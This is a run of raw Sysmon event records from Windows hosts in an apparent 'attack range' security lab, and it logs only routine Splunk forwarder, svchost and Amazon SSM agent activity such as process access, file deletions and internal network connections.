ntdll.dll+51791 10341000x8000000000000000284900Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:21.332{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-0DE9-6216-9D04-000000003802}2972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000284899Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:21.332{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0DE9-6216-9D04-000000003802}2972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000284898Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:21.333{C8EA50B7-0DE9-6216-9D04-000000003802}2972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000284897Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:21.129{C8EA50B7-0DE8-6216-9C04-000000003802}49002268C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000284908Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:22.567{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15725C37165707B867BB3FC0A1938281,SHA256=5750AFCE3C555500C91B4B85B472937F7883FDE07155879659352250E9AF707A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213961Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:22.088{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E406707A5B55872C5EAB0FEB36E1462,SHA256=5F65CC38D1D4B4ABC32823CF7076556B0764F342C73674B38882105DB695149C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284909Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:23.598{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AED184D4ABACC4C2A9CD06DE5F967C8,SHA256=D6F912C74B208C88931DBD3D5556737ED4DFD708FB1539CAB50DDFC34B8AFCF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213962Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:23.104{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D602CCCB3A3F1D93BB7F8EA5F9067D8E,SHA256=47F9F9706424731FBE4E2BF13F22EC07E6DCC8653CE9E27ACB478F892BAB9E40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284910Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:24.629{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1FF1FBA54C9712839C379BE6C6FA5AC,SHA256=1AA1760063027AA97E9EF3682E8E5F79BE7D542EBD65C5DBE910A137BE624775,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213963Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:24.135{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B738F566BB88F7B410EB4FB87ED0FD9,SHA256=D23DC5C16CBE8E8073B36468A4EE48F519ACEF349DC7797931FB2E6AB0850BFC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284912Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:25.645{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=627504D39284EC5B34EAF29732CF2BE7,SHA256=6BC7DE6261E84C07338D86AB3B93DD65E447F1735962D9C8E0CA87C5D630BD65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213965Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:25.151{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57D08297B79F19CC3A3F2C0760E3081E,SHA256=E3E23143E97946A95DA2B4BB5193D43D85746EA7A7A4ADF83CD6B8EA44FEB1EE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000284911Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:23.576{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53210-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000213964Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:22.667{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51158-false10.0.1.12-8000- 23542300x8000000000000000284913Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:26.676{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD59EC1D3634BE43677FA4AC2E333AC4,SHA256=9F42B8F2D0EBD86CC0F7EEEBA7D66630197D0C20C664E0FD8C351AED3069CF16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213966Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:26.166{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=800F37F782FF85E394B5D091B6544447,SHA256=398AF51ECB7261AE0BD2D9B3B4A9D919EFDAC9EAFFA2803F5323469C03100834,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284914Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:27.692{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=263C54DC51645637FB0DC2FFB519900B,SHA256=8448689C35D8313798AAB93314CB87BBF71FC1FC040422E177AFA7D116A95674,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213967Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:27.277{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E8D659C369F5C195BD0ED28B06D3A80,SHA256=F72C9D0B981F3F3C2E1A1E0AA68C209358FCD261470A655EE2D778A7DEB41178,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284915Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:28.817{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=313DF6ED60C24BD4EA21846D43CE1262,SHA256=8592340AA44D3DE13AD0D7B2F1AB35685BB474AE16B26EFCBCFC017E86A40B54,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213968Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:28.494{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3820E2F357C678DA20022B0D5D8E77EF,SHA256=433DF06B0ADDF12AAB76B0969006783F6A7E7EAA12815723CCEDABC0BBBB9A82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284916Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:29.832{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04F77D5A04AB796F2D90160668EF4620,SHA256=887C1761C1993B5B70C4F27EA76D8E03D8AB6128E83822686800EC966AABB8CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213969Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:29.557{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C310A1044CB481F7BE44A300EC44631,SHA256=E77072080721FAF45C305A376135F2F2317A3465B680FF5A4518F0F7B73DF03D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284917Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:30.848{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CE834FF92E9D1244FAFFF707DBD093C,SHA256=D7E796B51A84EB5D232FC0C6731C8342F7BECB4290F41A4098C70BB02FB34F28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213971Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:30.557{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AEA04BB83863955D7C04A7DF6A8DCA4,SHA256=A1B7DEAB529D99CEBA8ED04C192F9896116EEFC08CCABC41D209B706541B4127,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213970Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:30.229{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=6D4BABD62A41EBD92D22888E52FB2E91,SHA256=BFF91A2B4B0F177297517E4743CE194B8988D24D47314D122F4D2BD849CF334F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284918Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:31.863{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CDD8FDCDADF2F4048FC5CEAC82EE541,SHA256=A19D66719C85B05AF5CF1A63B2FA0F4ADA06DA8BA3A535B7C1A3AA642A90FDE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213973Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:31.588{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5B48D9880853DFA49CAA6304A21A452,SHA256=A57F8217D17CF8A26FE524AB67C43898DB719BA5FFD93C0992DDDB40E3A57C0D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000213972Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:28.573{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51159-false10.0.1.12-8000- 23542300x8000000000000000284920Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:32.879{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DA646526B9DC64ACA6D6B1F1F34A0E3,SHA256=FFD4F7E1BD930EB383DDAA958765A75EC6BA1EFBE50179CAA95EC7579CB2C9D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213974Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:32.619{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78EA255D7B2EC553C1C6DCD3434B9B23,SHA256=B5F930BCFAB3BCE5D9E34C55D2C5BEF5E7681255989D5BA083040CB85E020E51,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000284919Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:29.591{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53211-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000284922Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:33.895{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA3170AD3314DC75ACB3910454AF2BBF,SHA256=36C435DF1B542E2145289993C5A1B84743866EFE2576A6CBEFAAD39BE86DF428,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213975Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:33.666{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE7A4057D4EB29900E83BE61B266B50E,SHA256=E2F1E05C87AEEB5B982327B0B91220DB9759407C6DE0D5E640104F0981D50FC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284921Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:33.238{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=B0956F38078B3CBAF25A7FC8ED2BB786,SHA256=83EC3215B2A59F5A621A054D9833BFD48E227B584D5DD70E47C720341E87CA7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284923Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:34.910{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2086E3D3886848E9CC991BD06A5942F,SHA256=80C0F0A375C6F3525F1246A59AECDE509E047B539E49829EDD097602EB83641F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213976Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:34.807{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6B0C68AB1F8D04BA6E16EBA32EC7FCE,SHA256=8D40510BABC7A2DF166D16841A0F7481FFDBD2AFB44B711B9100E10BFDB94E8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213979Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:35.841{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80F990D1308E08805A38AB29D1BECCB8,SHA256=A9CCDC9EE21D6AC624D1AAC1D15580D0D0E856C34F926BBA81A20B895057C567,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000213978Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:33.651{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51160-false10.0.1.12-8000- 23542300x8000000000000000213977Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:35.406{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-119MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213981Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:36.902{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E3B1654CC037A59931AD945AAA9B66B,SHA256=E98D0E3622C645E02E7312C3D6146B37DFC6DA4EB8CF0589AA946E13BE77F973,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284924Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:36.004{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94E165C214E7BDDCE694ECC0E962F00F,SHA256=6BB67A0BA66AE37A005FE12BE4AF58D189749B4798429269C56D7D08305E7567,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213980Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:36.405{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-120MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213982Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:37.919{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2968E6099B9A296F90F366E79C61593,SHA256=20054D99115C614299867396DBEFB342F72DFA92459C179A4F137EE7DC5C90B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284925Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:37.207{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BB8AC4305AC5B4BC9A73B0B3D1B3043,SHA256=4746DC7F8FEF63C16B053933253148469C82E528F52C188A96FC7911917A937D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000284927Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:35.606{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53212-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000284926Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:38.223{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80C8D43FC64CF15A106F99EACF8C11E3,SHA256=92C2BD42C7912DA176E249E77E6421632694FC25809BFD823FE46828F7A9F316,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284929Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:39.410{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284928Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:39.238{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 